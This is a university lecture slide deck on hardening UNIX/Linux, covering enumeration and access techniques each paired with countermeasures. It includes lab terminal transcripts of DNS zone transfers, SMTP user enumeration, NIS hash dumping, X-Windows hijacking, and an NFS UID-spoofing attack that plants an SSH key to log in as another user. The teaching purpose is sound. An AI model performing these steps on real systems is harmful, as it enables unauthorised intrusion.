1 ISEC0514 Computer Systems Security and Privacy Lecture Notes #8 Hardening UNIX/Linux.

1

ISEC0514Computer Systems Security

and Privacy

Lecture Notes #8Hardening UNIX/Linux

UNIX Hacking

The most common target for a hacker is to get to user root, which can control everything on a UNIX server.

UNIX hacking include common footprinting and enumeration techniques. Gathering public information Port scanning Various enumeration techniques

These information leads to system compromise.

2

Gathering Public Information

Web sites Internal web sites External web sites

Public FTP server IP address information through whois

database DNS

Server addresses MX records Tools: host, nslookup, dig

google3

DNS Information

4

[root@test ~]# host -l -a miss.comTrying "miss.com";; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14233;; flags: qr aa ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:;miss.com. IN AXFR

;; ANSWER SECTION:miss.com. 10800 IN SOA miss.com. admin.miss.com. ...miss.com. 10800 IN NS pentarget.miss.com.miss.com. 10800 IN MX 10 pentarget.miss.com.ns.miss.com. 10800 IN CNAME pentarget.miss.com.pentarget.miss.com. 10800 IN A 192.168.4.3pentest.miss.com. 10800 IN A 192.168.4.2www.miss.com. 10800 IN CNAME pentarget.miss.com.miss.com. 10800 IN SOA miss.com. admin.miss.com. ...

DNS Hardening

DNS configuration can hardened (Bind - /etc/named.conf). Allow query to any clients. Allow transfer only to secondary servers. Allow recursion only to local clients.

5

options { ... allow-query { any; }; allow-transfer { localhost; 192.168.4.4; }; allow-recursion { localhost; 192.168.4.0/24; }; recursion yes; ...};

DNS Hardening

Hardening result:

6

[root@test nfs]# host -l -a miss.comTrying "miss.com"; Transfer failed.Trying "miss.com"Host miss.com not found: 9(NOTAUTH)Received 40 bytes from 192.168.4.3#53 in 1 ms; Transfer failed.

Network Enumeration

traceroute Ping sweep Port scanning

7

Traceroute

Network topology can be found by using traceroute.

Firewall location may also be located.

8

[bash]$ traceroute example.comtraceroute to example.com (192.168.1.7), 30 hops max, 38 byte packets1 (10.1.1.1) 4.264 ms 4.245 ms 4.226 ms2 (10.2.1.1) 9.155 ms 9.181 ms 9.180 ms3 (192.168.10.90) 9.224 ms 9.183 ms 9.145 ms4 (192.168.10.33) 9.660 ms 9.771 ms 9.737 ms5 (192.168.10.217) 12.654 ms 10.145 ms 9.945 ms6 (192.168.11.173) 10.235 ms 9.968 ms 10.024 ms7 (192.168.12.97) 133.128 ms 77.520 ms 218.464 ms8 (192.168.13.78) 65.065 ms 65.189 ms 65.168 ms9 (192.168.14.252) 64.998 ms 65.021 ms 65.301 ms10 (192.168.100.130) 82.511 ms 66.022 ms 66.17011 www.example.com (192.168.1.7) 82.355 ms 81.644 ms 84.238 ms

Traceroute Countemeasures

You cannot block inbound traceroute from the outside network, since it can be any kind of IP packets.

However, you can block outbound ICMP TTL-exceeded (ICMP type 11), which is the response of the internal machines to the traceroute source.

9

Local Machines

AttackerFW

Any IP packets

ICMP TTL-exceeded

Ping Sweeps

Ping sweep can be done by sending ICMP-echo (type 8) from the outside and wait for ICMP-echo-reply (type 0).

Ping sweep can also be done by using other techniques, such as sending ICMP-info-request (type 15).

Tools: nmap fping hping2

10

Ping Sweeps

11

[root@test static]# ./icmpenumUSAGE: ./icmpenum [opts] [-c class C] [-d dev] [-i 1-3] [-s src] [-t sec] hosts ...-c class C in x.x.x.0 form -i icmp type to send/receive, types include the following: 1 echo/echo reply (default) 2 timestamp request/reply 3 info request/reply 4 mask request/reply -d device to grab local IP or sniff from, default is eth0 -s spoofed source address -t time in seconds to wait for all replies (default 5)[root@test static]# ./icmpenum -i 2 -i eth0 -c 192.168.4.1192.168.4.2 is up192.168.4.3 is up

Ping Sweep Countermeasures

Block ICMP echo and other unused types.

12

Port Scanners and OS Detection

Port scanning tools nmap strobe tcp_scan, udp_scan (part of SAINT) netcat (nc)

OS detection tools nmap queso

13

Detecting Port Scanners

There are several tools that can be used to detect port scanning activities. psad scanlogd (TCP only) Snort

Some software can also integrate with firewall, so that further scanning can be prevented.

14

Banner Grabbing

Possible information include Secure shell server software and

protocol version Mail server software

Tools telnet netcat amap vmap

15

Banner Grabbing

16

[root@test static]# telnet 192.168.4.3 22Trying 192.168.4.3...Connected to 192.168.4.3.Escape character is '^]'.SSH-2.0-OpenSSH_5.2

Protocol mismatch.Connection closed by foreign host.

[root@test static]# telnet 192.168.4.3 25220 relay.mut.ac.th ESMTP Sendmail 8.13.8/8.14.2; ...quit221 2.0.0 xxx.xxx.ac.th closing connection

Connection to host lost.

FTP Enumeration An attacker may use any FTP client to scan directory

structure inside an FTP server to check whether you have any wrong permission settings in the server.

Most anonymous FTP server allows password to be any e-mail address.

If a world-writable directory is found, the attacker will have a way to upload (hack)tools to your server and find the way it execute it later.

If the FTP server software has security issues, the attacker may launch an exploit against it.

Successful exploit will give the attacker a user with FTP service privilege.

17

SMTP Enumeration

SMTP server may be used to gain more information about users on the target machine.

SMTP special command like VRFY can be used to confirm valid usernames.

EXPN can be used to expand usernames in a mailing list.

18

SMTP Enumeration

19

[root$]telnet 10.219.100.1 25Trying 10.219.100.1...Connected to 10.219.100.1.Escape character is '^]'.220 mail.example.com ESMTP Sendmail Tue, 15 Jul 2008vrfy root250 root <[email protected]>expn test250 test <[email protected]>expn mailing-list250 .... the whole list of subscribers ... quit221 mail.example.com closing connection

TFTP Enumeration Trivial File Transfer Protocol (TFTP) is a UDP-

based protocol for unauthenticated “quick and dirty” file transfers.

TFTP runs on UDP port 69. TFTP is commonly used to transfer devices

ROM images and configuration backups/restores.

Configuration can have valuable information to the attacker, such as passwords or hashes of the network devices.

You should always block TFTP request from trusted addresses.

20

Finger Enumeration

On old UNIX servers, finger service may be running.

The attacker may get the list of logged-in users, as well as, valid user names.

Finger service is not common in modern UNIX anymore.

21

[root$]finger [email protected][192.168.202.34] Line User Host(s) Idle Location* 2 vty 0 idle 0 192.168.202.14

RPC Enumeration

All RPC-based services must be registered to the RPC server.

Common RPC services include NIS and NFS.

rpcinfo command can be used to enumerate available services, service versions, and open ports.

RPC server itself runs on TCP and UDP port 111.

RPC server service is commonly referred to as rpcbind or portmapper.

22

RPC Enumeration

23

[root@test static]# rpcinfo -p 192.168.4.3 program vers proto port service 100000 4 tcp 111 portmapper 100000 4 udp 111 portmapper 100024 1 udp 50626 status 100024 1 tcp 34440 status 100011 2 udp 875 rquotad 100011 2 tcp 875 rquotad 100021 4 udp 51211 nlockmgr 100021 4 tcp 49851 nlockmgr 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100005 2 udp 47214 mountd 100005 2 tcp 46771 mountd 100005 3 udp 47214 mountd 100005 3 tcp 46771 mountd

R-cmd Enumeration R-commands are used in traditional UNIX to

support remote administration tasks. Authentication is controlled using a config file

called .rhosts in the home directory of the target user.

Common misconfiguration is to put a plus symbol (+) to be in the rhosts file. This allows every machine to remote control the target machine as the specified user.

R-commands include: rexec, rsh, rlogin, rcp. R-commands are not common in modern UNIX.

SSH should be used as replacement.

24

R-cmd Enumeration

25

hammer$ cat .rhostsgryphon.csi.cam.ac.ukoneeye.csi.cam.ac.uk

gryphon$ rlogin hammer.thor Last login: Mon Oct 11 13:10:02 from gryphon.csi.cam.ac.uk Solaris Release 2.5 [hammer] Linux Redhat Release 4.2hammer$

gryphon$ rsh -l rjd4 hammer.thor.cam.ac.uk uname -n hammer.thor.cam.ac.uk

NIS Enumeration

NIS data can be retrieved using ypcat and ypmatch command.

NIS data may be accessed remotely, but the attacker needs to know the NIS domain name.

26

[root@pentarget ~]# nisdomainnamemiss[root@pentarget ~]# ypcat passwdtestnis1:!!:1001:1001::/home/testnis1:/bin/bashtest1:!!:501:501::/home/test1:/bin/bashadmin:$6$OKCPxAVpdPN$pn...pVp8B6i.:500:500::/home/admin:/bin/bash[root@pentarget ~]# ypmatch admin passwdadmin:$6$OKCPxAVpdPN$pn...pVp8B6i.:500:500::/home/admin:/bin/bash[root@pentarget ~]#

Hardening NIS

Configure (/var/log/)securenets configuration files to allow NIS access only from NIS client machines.

Make NIS domain name harder to guess.

Note that NIS domain name can be found easily if you can log into the NIS client machine.

27

NFS Enumeration

NFS exports can be remotely found by using showmount command.

NFS authentication, by default, is checked against IP address of the NFS client machines.

If the address is trusted, any UID supplied by the client will be trusted by the server too.

Any misconfiguration on the NFS exports may lead to system compromise.

nfsshell is another tool to interact with NFS server directly.

28

NFS Attacks

29

[root@pentarget ~]# cat /etc/exports/home *(rw)/mnt pentarget.miss.com(rw)/usr *(ro)

[root@pentest static]# showmount -e 192.168.4.3Export list for 192.168.4.3:/usr */home */mnt pentarget.miss.com

NFS Attacks

30

[root@pentest ~]# mount 192.168.4.3:/home /mnt[root@pentest ~]# ls -l /mnttotal 12drwx------. 26 admin admin 4096 2010-02-18 16:05 admindrwx------. 6 501 501 4096 2010-02-16 15:22 test1[root@pentest ~]# useradd -u 501 hoho[root@pentest ~]# id hohouid=501(hoho) gid=501(hoho) groups=501(hoho)[root@pentest ~]# su - hoho[hoho@pentest test1]$ cd /mnt/test1[hoho@pentest test1]$ mkdir .ssh[hoho@pentest test1]$ cd .ssh[hoho@pentest .ssh]$ cp ~/.ssh/id_rsa.pub authorized_keys[hoho@pentest .ssh]$ chmod 644 authorized_keys[hoho@pentest .ssh]$ chmod 700 .

NFS Attacks

31

[hoho@pentest .ssh]$ ls -latotal 12drwx------. 2 hoho hoho 4096 2010-02-18 17:29 .drwx------. 7 hoho hoho 4096 2010-02-18 17:28 ..-rw-r--r--. 1 hoho hoho 403 2010-02-18 17:29 authorized_keys[hoho@pentest .ssh]$ ssh-agentSSH_AUTH_SOCK=/tmp/ssh-jGbArm2818/agent.2818; export SSH_AUTH_SOCK;SSH_AGENT_PID=2819; export SSH_AGENT_PID;echo Agent pid 2819;[hoho@pentest .ssh]$ SSH_AUTH_SOCK=/tmp/ssh-jGbArm2818/agent.2818; export SSH_AUTH_SOCK;[hoho@pentest .ssh]$ SSH_AGENT_PID=2819; export SSH_AGENT_PID;

NFS Attacks

32

[hoho@pentest .ssh]$ ssh-addEnter passphrase for /home/hoho/.ssh/id_rsa:Identity added: /home/hoho/.ssh/id_rsa (/home/hoho/.ssh/id_rsa)[hoho@pentest .ssh]$ ssh -l test1 192.168.4.3...Last login: Tue Feb 16 15:24:27 2010 from 192.168.4.2[test1@pentarget ~]$ iduid=501(test1) gid=501(test1) groups=501(test1)

Hardening NFS

Only export file systems to trusted machines. Export file systems read-only if possible. Use root ownership of exported files and

directories. Do not export the server's executables. Always use showmount command to double-

check that you configure it securely. Do not allow users to log into the NFS server. Use TCP_Wrappers to block NFS access, if

possible.

33

X-Windows Security

X-Windows allows many privileges to remote access including: Capture keystrokes Kill windows Capture windows Remap keyboard keys

X access control is xhost authentication. Xhost authentication is IP-based. Most users

simple type “xhost +” to allow access. This means that anyone can access the X-

Windows system on the server.

34

X-Windows Security

xscan can be used to scan for X-Windows access on the networks.

xlsclients list all windows on a display xkill kills any window. xwd dumps a screen to a file. xwud displays a image created by xwd.

35

X-Windows Security

36

[testnis1@pentarget ~]$ iduid=1001(testnis1) gid=1001(testnis1) groups=1001(testnis1)[testnis1@pentarget ~]$ xlsclientsxlsclients: unable to open display ""

[admin@pentarget ~]$ xhost +Access control disabled, clients can connect from any host[admin@pentarget ~]$

X-Windows Security

37

[testnis1@pentarget ~]$ xlsclients -display :0.0 –l...Window 0xe00001: Machine: pentarget.miss.com Name: Terminal Icon Name: gnome-terminal Command: gnome-terminal Instance/Class: gnome-terminal/Gnome-terminalWindow 0x4200001: Machine: pentarget.miss.com Name: Firefox Icon Name: firefox Command: firefox Instance/Class: firefox/Firefox...[testnis1@pentarget ~]$ xkill -display :0.0 -id 0x4200001xkill: killing creator of resource 0x4200001

Vulnerability Mapping

After gaining security information on the server, a hacker can manually map it to get potential vulnerabilities.

This process is called vulnerability mapping which can be done by: Manually map gathered information to find

potential vulnerabilities. Public and proof-of-concept exploits can be

used to test whether vulnerabilities can successfully exploited.

Use vulnerability scanners to find potential exploits, but this is noisy.

38

Vulnerability Mapping

Script kiddies simply skip vulnerability mapping process, and shoot everything at the target.

It’s common to get windows exploits targeting UNIX/Linux servers.

39

Vulnerability Mapping

Common vulnerability mapping process include: Perform network reconnaissance against the

target system. Map attributes such as operating system,

architecture, and specific versions of listening services to known vulnerabilities and exploits.

Perform target acquisition by identifying and selecting key systems.

Enumerate and prioritize potential points of entry.

40

System Access

There are two type of gaining access to a UNIX/Linux server. Remote access is done by gaining

access via the network or communication channel.

Local access is done by having actual command shell and escalating to a higher privileges. This is usually called privilege escalation attacks.

41

System Access

Remote access and local access are related.

Attackers remotely exploit a vulnerability in a listening service and then gaining local shell access.

Once shell access is obtained, the attackers are considered to be local on the system.

Then, attackers escalate their local privileges to root.

42

Brute-Force Attack

Password brute-force attack can be conducted on several services including: telnet ftp R-commands Secure shell (SSH) POP3, IMAP HTTP, HTTPS CVS/SVN

43

Brute-Force Attack

Tools: Hydra ADM-pop.c SNMPBrute

44

Brute-Force Attack Countermeasures

Use strong passwords by enforcing password policy.

This can be done setting configurations and additional software Cracklib System configurations

/etc/security/login.conf PAM

45

Brute-Force Attack Countermeasures

In addition to general password strength recommendations, Log multiple authentication failures. Implement account lockout where

possible (beware of DoS attack). Disable unused services. Use stronger authentication when

possible, for example One-time password (OTP). public key authentication. Security tokens.

46

Attacks from Bad Coding

Attacks from bad coding behavior include: Buffer overflow attacks Format string attacks Weak input validation Integer overflow and integer sign

attacks Dangling pointer attacks

47

Countermeasures

Always update software with security patches.

Beware of obsolete software. Use secure coding practices. Conduct software audits regularly. Disable unused services.

48

Stack Protection

Administrators may disable stack execution to lower chances of getting attacked by stack overflow techniques.

This can be done by modify settings in proper (OS-dependent) configuration files. Solaris: /etc/system Linux: depends on distributions

This does not prevent other similar techniques, such as heap overflow.

49

Generic UNIX Protection For all UNIX machines, following protection

measures can be done: Separate networks for UNIX servers from clients. Using TCP_Wrappers. Enable host-based firewall. Consider what traffic should pass firewall.

RPC traffic can remain inside DMZ. Enforce password policy. Do not share admin accounts. Centralize logs to a log server (syslog). Disable root login (except for recovery). Implement sudo.

Letting users perform tasks as root or privileged user.

50

Separate Server Networks

DMZ should be implemented to separate public and private machines.

51

Reference

Hacking Exposed 6th edition. 9780071613743 Chapter 2,3,5

52